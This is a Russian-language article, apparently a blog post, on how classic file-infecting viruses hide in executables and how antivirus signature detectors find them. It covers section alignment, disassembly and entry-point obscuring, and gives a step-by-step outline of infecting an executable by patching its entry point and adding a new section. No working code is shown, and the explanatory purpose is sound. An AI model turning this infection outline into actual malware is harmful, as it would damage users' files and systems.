Необходимо упомянуть и о таком важном для вирмейкеров свойстве исполняемых файлов, как выравнивание. Для того чтобы файл оптимально читался с диска и отображался в память, секции в исполняемых файлах выровнены по границам, кратным степеням двойки, а свободное место, оставшееся от выравнивания (padding) заполнено чем-нибудь на усмотрение компилятора. Например, логично выравнивать секции по размеру страницы памяти – тогда ее удобно целиком копировать в память и назначать атрибуты. Даже вспоминать не буду про все эти выравнивания, везде, где лежит мало-мальски стандартный кусок данных или кода, его выравнивают (любой программист знает, что в километре ровно 1024 метра). Ну а описание стандартов Portable Executable (PE) и Executable Linux Format (ELF) для работающего с методами защиты исполняемого кода – это настольные книжки.

  • поставить указатель точно на начало какой-нибудь инструкции (просто так взять рандомное место в исполняемой секции и начать дизассемблирование с него нельзя, один и тот же байт может быть и опкодом инструкции, и данными)
  • определить длину инструкции (для архитектуры x86 инструкции имеют разные длины)
  • переместить указатель вперед на эту длину. Мы окажемся на начале следующей инструкции.
  • повторять, пока не решим остановиться
  1. Выбираем вкусный исполняемый файл (достаточно толстый, чтобы в него поместилось тело вируса, с нужным распределением секций и т.п.).
  2. Читаем свой код (код тела вируса).
  3. Берем несколько первых инструкций из файла-жертвы.
  4. Дописываем их к коду вируса (сохраняем информацию, необходимую для восстановления работоспособности).
  5. Дописываем к коду вируса переход на инструкцию, продолжающую исполнение кода-жертвы. Таким образом, после исполнения собственного кода вирус корректно исполнит пролог кода-жертвы.
  6. Создаем новую секцию, записываем туда код вируса и правим заголовок.
  7. На место этих первых инструкций кладем переход на код вируса.

Думаю, не надо описывать вам компоненты современного антивируса, все они крутятся вокруг одного функционала – антивирусного детектора. Монитор, проверяющий файлы на лету, сканирование дисков, проверка почтовых вложений, карантин и запоминание уже проверенных файлов – все это обвязка основного детектирующего ядра. Второй ключевой компонент антивируса – пополняемые базы признаков, без которых поддержание антивируса в актуальном состоянии невозможно. Третий, достаточно важный, но заслуживающий отдельного цикла статей компонент – мониторинг системы на предмет подозрительной деятельности.

Итак (рассматриваем классические вирусы), на входе имеем исполняемый файл и один из сотни тысяч потенциальных вирусов в нем. Давайте детектировать. Пусть это кусок исполняемого кода вируса:

  • сокрытие кода самого вируса;
  • сокрытие его точки входа.

Сокрытие точки входа (Entry Point Obscuring) в результате послужило толчком для появления в вирусных движках автоматических дизассемблеров для определения, как минимум, инструкций перехода. Вирус старается скрыть место, с которого происходит переход на его код, используя из файла то, что в итоге приводит к переходу: JMP, CALL, RET всякие, таблицы адресов и т.п. Таким образом, вирус затрудняет указание смещения сигнатуры.

Гораздо более подробно некоторые алгоритмы таких движков и детектора мы посмотрим во второй статье, которую я планирую написать в ближайшее время.

Рассмотренный в статье детектор легко детектирует неполиморфные (мономорфными их назвать, что ли) вирусы. Ну а переход к полиморфным вирусам является отличным поводом, наконец, завершить эту статью, пообещав вернуться к более интересным методам сокрытия исполняемого кода во второй части.

Читайте также: